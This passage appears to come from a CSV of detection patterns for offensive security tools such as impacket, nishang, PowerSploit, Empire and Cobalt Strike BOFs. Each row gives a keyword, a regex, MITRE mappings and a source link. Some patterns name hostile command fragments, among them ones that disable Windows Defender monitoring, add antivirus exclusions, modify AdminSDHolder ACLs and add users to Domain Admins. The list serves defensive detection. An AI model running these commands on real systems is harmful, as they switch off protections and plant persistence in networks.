tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*addcomputer.py -computer-name * -computer-pass * -dc-host * -domain-netbios *",".{0,1000}addcomputer\.py\s\-computer\-name\s.{0,1000}\s\-computer\-pass\s.{0,1000}\s\-dc\-host\s.{0,1000}\s\-domain\-netbios\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*addcomputer.py -delete -computer-name * -dc-host * -domain-netbios 
*",".{0,1000}addcomputer\.py\s\-delete\s\-computer\-name\s.{0,1000}\s\-dc\-host\s.{0,1000}\s\-domain\-netbios\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*addcomputer.py*",".{0,1000}addcomputer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*Add-ConstrainedDelegationBackdoor*",".{0,1000}Add\-ConstrainedDelegationBackdoor.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Add-Exfiltration.ps1*",".{0,1000}Add\-Exfiltration\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Adding GlobaLeaks PGP key to trusted APT keys*",".{0,1000}Adding\sGlobaLeaks\sPGP\skey\sto\strusted\sAPT\skeys.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*Add-KeePassConfigTrigger*",".{0,1000}Add\-KeePassConfigTrigger.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","895","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" "*AddKeePassTrigger.ps1*",".{0,1000}AddKeePassTrigger\.ps1.{0,1000}","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*AddKeePassTrigger.ps1*",".{0,1000}AddKeePassTrigger\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*Add-MpPreference -DisableBehaviorMonitoring True*",".{0,1000}Add\-MpPreference\s\-DisableBehaviorMonitoring\sTrue.{0,1000}","offensive_tool_keyword","powershell","Windows defender disable protection","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Add-MpPreference -DisableBehaviourMonitoring True*",".{0,1000}Add\-MpPreference\s\-DisableBehaviourMonitoring\sTrue.{0,1000}","offensive_tool_keyword","powershell","Windows defender disable protection","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Add-MpPreference -DisDisableRealtimeMonitoring True*",".{0,1000}Add\-MpPreference\s\-DisDisableRealtimeMonitoring\sTrue.{0,1000}","offensive_tool_keyword","powershell","Windows defender disable 
protection","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Add-MpPreference -ExclusionPath *",".{0,1000}Add\-MpPreference\s\-ExclusionPath\s.{0,1000}","offensive_tool_keyword","powershell","Windows Defender evasion add an exclusion directory for your shady stuff","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Add-MpPreference -ExclustionPath c:\users\public*",".{0,1000}Add\-MpPreference\s\-ExclustionPath\sc\:\\users\\public.{0,1000}","offensive_tool_keyword","powershell","Windows Defender evasion add an exclusion directory for your shady stuff","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder*CN=System' -PrincipalSamAccountName * -Rights All*",".{0,1000}Add\-ObjectAcl\s\-TargetADSprefix\s\'CN\=AdminSDHolder.{0,1000}CN\=System\'\s\-PrincipalSamAccountName\s.{0,1000}\s\-Rights\sAll.{0,1000}","offensive_tool_keyword","powerview","modifying existing permissions on an Active Directory object ('AdminSDHolder'). which can be used to maintain unauthorized access or escalate privileges in the targeted environment. The 'AdminSDHolder' container plays a crucial role in managing the security of protected groups in Active Directory. 
and modifying its permissions may lead to unintended security consequences.","T1222","TA0003","N/A","N/A","Persistence","https://github.com/zloeber/PSAD/blob/master/src/inprogress/Add-ObjectACL.ps1","1","0","N/A","N/A","1","15","2","2017-10-26T20:35:53Z","2017-07-07T13:34:07Z" "*Add-Persistence *",".{0,1000}Add\-Persistence\s.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Add-Persistence*",".{0,1000}Add\-Persistence.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Add-Persistence.ps1*",".{0,1000}Add\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Add-Persistence.ps1*",".{0,1000}Add\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*addPreloadToPrivesc*",".{0,1000}addPreloadToPrivesc.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*addpriv SeloadDrivePrivilege*",".{0,1000}addpriv\sSeloadDrivePrivilege.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Add-PSFirewallRules*",".{0,1000}Add\-PSFirewallRules.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ADDR ?= 127.0.0.1:4444*",".{0,1000}ADDR\s\?\=\s127\.0\.0\.1\:4444.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*Add-RegBackdoor.ps1*",".{0,1000}Add\-RegBackdoor\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*Add-RegBackdoor.ps1*",".{0,1000}Add\-RegBackdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Add-RemoteRegBackdoor*",".{0,1000}Add\-RemoteRegBackdoor.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Using DAMP toolkit We add the backdoor using the Add-RemoteRegBackdoor.ps1 cmdlet from DAMP.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Add-RemoteRegBackdoor*",".{0,1000}Add\-RemoteRegBackdoor.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","373","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*Add-RemoteRegBackdoor.json*",".{0,1000}Add\-RemoteRegBackdoor\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" 
"*addresshunter.h*",".{0,1000}addresshunter\.h.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Add-ScrnSaveBackdoor.ps1*",".{0,1000}Add\-ScrnSaveBackdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Add-ServiceDacl *",".{0,1000}Add\-ServiceDacl\s.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Add-ServiceDacl*",".{0,1000}Add\-ServiceDacl.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*addspn.py -u * -p * -t * -s * --additional *",".{0,1000}addspn\.py\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-t\s.{0,1000}\s\-s\s.{0,1000}\s\-\-additional\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*addspn.py*",".{0,1000}addspn\.py.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "*AddUser-Bof.c*",".{0,1000}AddUser\-Bof\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","63","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" "*AddUser-Bof.git*",".{0,1000}AddUser\-Bof\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","63","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" "*AddUser-Bof.o*",".{0,1000}AddUser\-Bof\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","63","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" "*AddUser-Bof.x64*",".{0,1000}AddUser\-Bof\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","63","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" "*AddUser-Bof.x86*",".{0,1000}AddUser\-Bof\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","63","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" 
"*AddUserImplant*",".{0,1000}AddUserImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*AddUserToDomainGroup *Domain Admins*",".{0,1000}AddUserToDomainGroup\s.{0,1000}Domain\sAdmins.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
